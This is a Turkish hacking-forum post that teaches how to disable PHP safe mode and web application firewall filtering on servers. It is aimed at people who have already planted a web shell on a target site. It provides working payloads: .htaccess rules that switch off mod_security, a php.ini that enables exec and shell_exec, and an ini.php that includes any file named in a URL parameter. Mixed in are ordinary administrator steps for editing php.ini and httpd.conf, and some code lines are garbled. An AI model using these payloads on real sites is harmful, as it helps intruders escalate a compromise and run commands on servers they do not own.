Sunucularda Güvenlik Modunu Deaktive Etme Detaylı Anlatım

1. Sunucularda Güvenlik Modunu Devre Dışı Bırakma Detaylı Anlatım
2.  
3. [img]http://i.hizliresim.com/ad95yO.gif[/img]
4.  
5. Nette ilk ve Tek :) :D
6.  
7. Server Safe Mode Off Hale Getirmek
8. Sunucularda Güvenlik Modunu Devre Dışı Bırakma Detaylı Anlatım
9.  
10. Selamün Aleyküm. Ben KingSkrupellos / Cyberizm.Org. Bugün size çok farklı yollardan Shellerdeki Güvenlik Modu nasıl kapatılır ve kırmızı'dan yeşil'e çevrilir onu anlatmak istiyorum.
11.  
12. DİPNOT => Aşağıda vereceğim kodlar tamane %100 çalışmaktadır. O yüzden yapacağınız web sitesi saldırılarında indeks shell atmada kesinlikle CyBeRiZM.OrG sorumlu tutulamaz.
13.  
14. Tamamen Eğitim Amaçlı yazdığım bir dökümandır. İyi ve Hayırlı Günlerde kullanın.
15.  
16. Safe mode, sunucular için geliştirilmiş bir güvenlik önlemidir. Sunucularda otomatik yüklemeyi engellemek için kullanılır. Bu özellik ile sunuculara zararlı yazılımların yüklenmesi engellenmiş olmaktadır.
17.  
18. Bunun yanında bu zamana kadarki bazı WebDomainHosting Sitelerindeki önemli bir Güvenlik Atlatma yollarınıda göstermek istiyorum Allahın izniyle.
19.  
20. Hadi Başlıyalım =>
21.  
22. Shell yüklediğniz sitelerde eğer Hedef Siteyi hacklemek arzundaysanız Güvenlik Modu On Değil. Kesinlikle Safe Mod Off Olması gerekir.
23.  
24. Önemli Hatırlatma =>
25.  
26. Sunucunuzun güvenlik modunu (safe mod) kapattığınız andan itibaren hackerların işini kolaylaştırmış olursunuz. Bu tarz durumlarda saldırı aldığınızda sunucunuzda bulunan dosya/klasörleri bir daha geri getiremeyecek şekilde kaybedebilirsiniz.
27.  
28. [hide]Eğer bir sitede yazma izinlerinizin tamamı kapalı ise, aşağıdaki kodlardan ( .htaccess - ini.php - php.ini )'den yararlanarak Güvenlik Modunu pasif hale getiririz ve tüm izinler bize açılır.
29.  
30. Bakın ya bunları FTP Adresinden ya FileZilla gibi FTP Programlarından en son ise elimizdeki Shell'den yükleyebiliriz.
31.  
32. A) Maddesi
33.  
34. 1-).htaccess dosyanızın içine aşağıdaki kodu ekleyin.
35.  
36. [code]
37. # BEGIN safe mode
38. <IfModule mod_security.c>
39. SecFilterEngine Off
40. SecFilterScanPOST Off
41. </IfModule>
42. # END safe mode[/code]
43.  
44.  
45. 2-) ini.php dosyası oluşturup içine aşağıdaki kodu ekleyin ve htaccess in olduğu yere atın.
46.  
47. [code]<?
48. echo ini_get("safe_mode");
49. echo ini_get("open_basedir");
50. include($_GETsansursansursansur91;"file"sansursansursansur93;);
51. ini_restore("safe_mode");
52. ini_restore("open_basedir");
53. echo ini_get("safe_mode");
54. echo ini_get("open_basedir");
55. include($_GETsansursansursansur91;"ss"sansursansursansur93;);
56. ?>[/code]
57.  
58.  
59. 3-) php.ini dosyası oluşturup içine aşağıdaki kodu ekleyin ve htaccess in olduğu yere atınız.
60.  
61. [code]safe_mode = off
62. exec = On
63. shell_exec = On[/code]
64.  
65. B) Maddesi =>
66.  
67. FTP’den Dosyaları Safe Mode On/Off Yapmak
68.  
69. 1- Bir adet .txt dosyasının içerisine şunu yazıp kaydediyoruz: safe_mode = off
70. 2- Kayıt Ettiğimiz dosyayı FTP mize atıp adını , php.ini olarak değiştiriyoruz.
71. 3- Bu dosyayı daha sonra FTP mizde bulunan ve safe mode kapatmak istediğimiz yazılıma ait tüm klasörlere atıyoruz.
72. Bu şekilde siteniz için safe mode kapalı duruma gelmiş olacaktır.
73.  
74. Eğer geri açmak İçinse Oluşturduğunuz .txt Dosyasına şunu yazacaksınız : safe_mode = on ve aynı işlemleri geri yüklüyeceksiniz.
75.  
76. C) Maddesi =>
77.  
78. Aşağıdaki kod ile sunucudaki tüm siteler için Safe Mode kapalı olması yerine biz sadece kendi sitemizin Safe Mode ayarını kapalı hale getiriyoruz. Bizim sorunumuz dış bir kaynaktan resim çekmek ve bu resmi yayınlayamamaktan yanaydı.
79.  
80. Kodu sunucumuzda bulunan .htaccess dosyasına ekleyeceğiz. Bunun için bu dosyayı sunucumuzdan lokale çekip bir düzenleme programı ile açıp en alt satırına aşağıdaki kodu ekliyoruz.
81.  
82. [code]php_value safe_mode "0"[/code]
83.  
84. Eğer olmazsa bir de şu kod ile aynı işlemi deniyoruz:
85.  
86. [code]php_flag safe_mode off[/code]
87.  
88. Yine olmazsa sunucu üzerinde Apache ayarlarından Override durumlarını kontrol ettirip “All” yaptırmak gerekiyor.
89.  
90. D) Maddesi
91.  
92. Tüm Sunucudaki Sitelerin Ayarını Bozmak için yani Güvenlik Kapısını kapatmak için =>
93.  
94. SSH'a girin.
95.  
96. [code]nano /usr/local/lib/php.ini[/code]
97.  
98. yazıp
99.  
100. ctrl + f ile safe_mode aratın
101.  
102. sonra on yazan yeri off yapın
103.  
104. [code]service httpd restart yazın safe mode off[code] olacaktır..
105.  
106. E) Maddesi
107.  
108. ssh a girip ,
109.  
110. [code]nano /usr/local/apahe/conf/httpd.conf [/code]
111.  
112. yazınca
113.  
114. ctrl + w ile o siteyi arat
115.  
116. [code]DocumentRoot /home/cpuser/public_html/
117. ServerName siteadi.com[/code]
118.  
119. şeklinde birşey göreceksin, bu ikisinin arasına
120.  
121. [code]php_admin_flag safe_mode off[/code]
122.  
123. koyacaksın
124.  
125. [code]DocumentRoot /home/cpuser/public_html/
126. php_admin_flag safe_mode off
127. ServerName siteadi.com[/code]
128.  
129. F) Maddesi => Şimdi bu maddeyi ikiye ayırıcam =>
130.  
131. 1) Olarak => Öncelikle ssh ile root girişi yapıyoruz,
132. Daha sonra aşağıdaki komutla php.ini sayfasını açıyoruz.
133. nano /etc/php.ini
134. ctrl + w basıp safe_mode yazısını arıyoruz.
135. safe_mode=On yazar bu değeri safe_mode=Off olarak değiştiriyoruz.
136. başında ( ; ) olanda değil, başında ( ; ) olmayan satırda değişiklik yapıyoruz.
137. daha sonra service httpd restart veya apachectl -k restart komutu ile restart atıyoruz.
138.  
139. Tabiki aynı komutları kullanarak Plesk sunucular için Safe Modu on da yapabiliyoruz.
140.  
141. 2. Maddesel Özellik => Siteye Özel Safe Mode Kapatma
142.  
143. Bu yazımda size siteye özel nasıl safe mode kapatırız onu anlatacağım.
144.  
145. Ssh'ı yada putty'yi çalıştırıp aşağıdaki komutu yazın:
146.  
147. [code]pico /usr/local/apache/conf/httpd.conf[/code]
148.  
149. Bu komutları girdikten sonra safemodu kapatacağınız siteyi aratın (ctrl+w yapıp siteniz.com'u):
150.  
151. [code]<VirtualHost 75.134.45.78>
152. ServerAlias siteniz.com
153. ServerAdmin webmaster@siteniz.com
154. DocumentRoot /home/siteniz/public_html
155. BytesLog domlogs/siteniz.com-bytes_log
156. <IfModule mod_userdir.c>
157. UserDir disabled
158. UserDir enabled siteniz
159. </IfModule>
160. User siteniz
161. Group siteniz
162. <IfModule mod_php4.c>
163. php_admin_value open_basedir "/home/siteniz/:/usr/lib/php:/usr/local/lib/php:/tmp"
164. </IfModule>
165. <IfModule mod_php5.c>
166. php_admin_value open_basedir "/home/siteniz/:/usr/lib/php:/usr/local/lib/php:/tmp"
167. </IfModule>[/code]
168.  
169. İşte burada sunucunuz hangi php sürümünü kullanıyorsa onun altına şu kodu ekliyoruz:
170.  
171. [code]
172. php_admin_flag safe_mode Off
173. Eğer php5 kullanıyorsa (ki büyük ihtimal php5'dir) şu kodun altına yukarıdaki kodu ekliyorsunuz:
174. Kod:
175. <IfModule mod_php5.c>
176. Sonuç:
177. Kod:
178. <VirtualHost 75.134.45.78>
179. ServerAlias siteniz.com
180. ServerAdmin webmaster@siteniz.com
181. DocumentRoot /home/siteniz/public_html
182. BytesLog domlogs/siteniz.com-bytes_log
183. <IfModule mod_userdir.c>
184. UserDir disabled
185. UserDir enabled siteniz
186. </IfModule>
187. User siteniz
188. Group siteniz
189. <IfModule mod_php4.c>
190. php_admin_value open_basedir "/home/siteniz/:/usr/lib/php:/usr/local/lib/php:/tmp"
191. </IfModule>
192. <IfModule mod_php5.c>
193. php_admin_flag safe_mode Off
194. php_admin_value open_basedir "/home/siteniz/:/usr/lib/php:/usr/local/lib/php:/tmp"
195. </IfModule>[/code]
196.  
197. Daha sonra değiliklikleri kaydediyoruz (ctrl+x) ve /etc/init.d/httpd restart yazıp ssh'den çıkıyoruz.
198.  
199. ÖNEMLİ NOT: Şayet su php kullanıyorsanız kapatmak istediğiniz dizine chmod'u herhangi bir değerde olan bir php.ini dosyası oluşturmanız ve içerisine safe_mode = Off yazmanız yeterlidir.
200.  
201. G) Php Safe Mode Açma ve Kapatma
202.  
203. Aşağıdaki komutların tamamını root yetkisi ile SSH üzerinden gerçekleştirmelisiniz.
204.  
205. Öncelikle php.ini dosyamızın yolunu öğreniyoruz;
206.  
207. [code]php -i | grep php.ini[/code]
208.  
209. Eğer sunucunuz cPanel ise aşağıdaki gibi çıkacaktır ;
210.  
211. [code]/usr/local/lib/php.ini[/code]
212.  
213. php.ini dosyamızı açıyoruz ;
214.  
215. [code]nano /usr/local/lib/php.ini[/code]
216.  
217. safe_mode açıyoruz ;
218.  
219. [code]safe_mod = On;[/code]
220.  
221. Eğer kapatmak isterseniz ;
222.  
223. [code]safe_mod = Off;[/code]
224.  
225. H) Maddesi =>
226.  
227. 9) PHP Safe Mode Ayarlamak
228.  
229. PHP Safe Mode deaktif etmek WHM/cPanel üzerinden PHP Configuration Editor(PHP Yapılandırma Düzenleyicisi) kısmından Safe Mode ayarlarını off yaparak kapatabilirsiniz. SSH üzerinden yapmak içinse ilk olarak php.ini dosyası hangi dizin yolunda onu bulmak gerek.
230.  
231. Dosyamız hangi dizinde onu bulmak için;
232. root[~]# php -i | grep php.ini
233.  
234. Dosyada işlem yapmak için;
235. root[~]# nano /usr/local/lib/php.ini (Düzenleme yapmak için)
236. root[~]# pico /usr/local/lib/php.ini (Düzenleme yapmak için)
237. root[~]# cat /usr/local/lib/php.ini (İçeriği görüntülemek için)
238.  
239. safe_mode = Off yapıp kaydedebilirsiniz. Düzenleme işlemini WinSCP'den de yapabilirsiniz. Bu işlemi yaparsanız tüm sunucu için bu ayarlamanın geçerli olduğunu unutmayın. Sadece tek bir site üzerinde Safe Mode problemi alıyorsanız o sitenin Htaccess dosyasına Safe Mode deaktif kodunu ekleyerek çözüm sağlayabilirsiniz.
240.  
241. İ) PHP 5.2.17 yeni Safe mode Bypass
242.  
243. Farklı bir kodlama denedim. Bu da işe yaradı. İnşAllah işinize yarar.
244.  
245. PHP.ini
246.  
247. [code]short_open_tag = On
248. log_errors = On
249. log_errors_max_len = 1024
250. ignore_repeated_errors = On
251. register_globals = Off
252. magic_quotes_runtime = Off
253. magic_quotes_gpc = On
254. allow_url_fopen = on
255. AddHandler application/x-httpd-php4 .php
256. display_errors = Off
257. disable_functions = Bypass JoNaHHex
258. safe_mode = Off[/code]
259.  
260.  
261. ini.php
262.  
263. [code]<?
264. echo ini_get("safe_mode");
265. echo ini_get("open_basedir");
266. include($_GET["file"]);
267. ini_restore("safe_mode");
268. ini_restore("open_basedir");
269. echo ini_get("safe_mode");
270. echo ini_get("open_basedir");
271. include($_GET["ss"]);
272. ?>
273. [/code]
274.  
275. .htaccess
276.  
277. [code]Options +FollowSymLinks
278.  
279. DirectoryIndex ssssss.htm
280.  
281. Options All Indexes
282.  
283. <IfModule mod_security.c>
284.  
285. SecFilterEngine Off
286.  
287. SecFilterScanPOST Off
288.  
289. SecFilterCheckURLEncoding Off
290.  
291. SecFilterCheckCookieFormat Off
292.  
293. SecFilterCheckUnicodeEncoding Off
294.  
295. SecFilterNormalizeCookies Off
296.  
297. </IfModule>
298.  
299. SetEnv PHPRC /home/user/public_html/php.ini
300.  
301. suPHP_ConfigPath /home/user/public_html/php.ini[/code]
302.  
303. J) Maddesi
304.  
305. Plesk Sunucunuzda PHP Güvenli Modunun Kapatılması
306.  
307. Parallels Plesk Paneli yükleme sırasında PHP'yi varsayılan olarak "güvenli moda" ayarlar. PHP'yi "güvenli moddan" çıkarmak için ayrılmış sunucunuza uzaktan bağlanmanız ve sunucunun PHP başlangıç dosyasını değiştirmeniz gerekir.
308.  
309. Linux Sunucuları
310.  
311. Linux Sunucunuzda PHP Güvenli Modunu Kapatmak için
312.  
313. Sunucunuza SSH yoluyla bağlanın
314. Kök kullanıcıya geçiş yap
315. Sunucunuzun şifresini girin.
316. Aşağıdaki komutu çalıştırın:
317. vi /etc/php.ini
318. safe_mode = on satırına gidin ve "i" tuşuna basın.
319. Satırı safe_mode = off olarak değiştirin ve "Esc" tuşuna basın.
320. Dosyanızı kaydetmek için :wq! yazın.
321.  
322. Windows Sunucuları
323.  
324. Windows Sunucunuzda PHP Güvenli Modunu Kapatmak için
325.  
326. Sunucunuza, Uzak Masaüstü yoluyla bağlanın
327. Notepad'de c:\windowsphp.ini dosyasını açın.
328. safe_mode = on satırını safe_mode = off olarak değiştirin.
329. php.ini dosyasını kaydedin ve kapayın.
330. Dosyayı düzenledikten sonra Web sunucunuzu yeniden başlatmanız gerekir. Sunucu altında Hizmet Yönetimi bölümündeki durdur/başlat seçeneğini belirleyip Parallels Plesk Panel kullanarak Web sunucunuzu yeniden başlatabilirsiniz.[/hide]
331.  
332. #### Şimdilik Anlatacaklarım bu kadar. Mr. KingSkrupellos. Cyberizm.Org Digital Security Technological Turkish Moslem Army ####
333.  
334. Orjinal Konu Linki => https://www.cyberizm.org/cyberizm-sunucularda-guvenlik-modunu-devre-disi-birakma-detayli-anlatim.html